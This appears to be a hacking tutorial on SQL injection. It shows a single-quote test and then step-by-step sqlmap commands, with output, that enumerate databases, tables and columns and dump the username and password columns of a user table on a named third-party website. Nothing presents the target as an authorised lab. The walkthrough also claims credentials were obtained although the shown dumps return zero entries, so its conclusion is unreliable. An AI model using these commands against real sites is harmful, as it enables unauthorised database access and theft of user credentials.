All we needed is a vulnerability webpage. Lets say you have a url like this
http://www.site.com/section.php?id=51
and that it is prone to sql injection because the developer of that site did not properly escape the parameter id.
This can be simply tested by trying to open the url
http://www.site.com/section.php?id=51'
We just added a single quote in the parameter. If this url throws an error then it is clear that the database has reacted with an error because it got an unexpected single quote..
To understand the process please change video quality to 1080p and watch in HD Quality
Step 1 – Finding Databases
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 –dbs
Output
———-
web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:00:51] [INFO] fetching database names
available databases [2]:
[*] 554777
[*] information_schema
Step 2 – Finding the table names
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 –tables
Output
———-
web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:01:25] [INFO] fetching tables for database: '554777'
Database: 554777
[6 tables]
+—————+
| abstract |
| answer |
| author |
| news_details |
| reporter_list |
| user |
+—————+
Step 3 – Finding the columns
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user –columns
Output
———-
web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:01:48] [INFO] fetching columns for table 'user' in database '554777'
Database: 554777
Table: user
[3 columns]
+———-+————-+
| Column | Type |
+———-+————-+
| password | varchar(50) |
| role | varchar(50) |
| username | varchar(50) |
+———-+————-+
Step 4 – Finding column values
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user -C username –dump
Output
———-
Database: 554777
Table: user
[0 entries]
+———-+
| username |
+———-+
+———-+
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user -C password –dump
Output
———-
Database: 554777
Table: user
[0 entries]
+———-+
| password |
+———-+
+———-+
So we get both username and password.
If the name is username and password is password, why I cannot login http://abstract.freevar.com/phpmyadmin?
Username and password are database user field value. It is not the original phpmyadmin username and password.
Using the username and password you can only login to the corresponding website only.
In http://abstract.freevar.com am not included any login page so you can’t login into that website.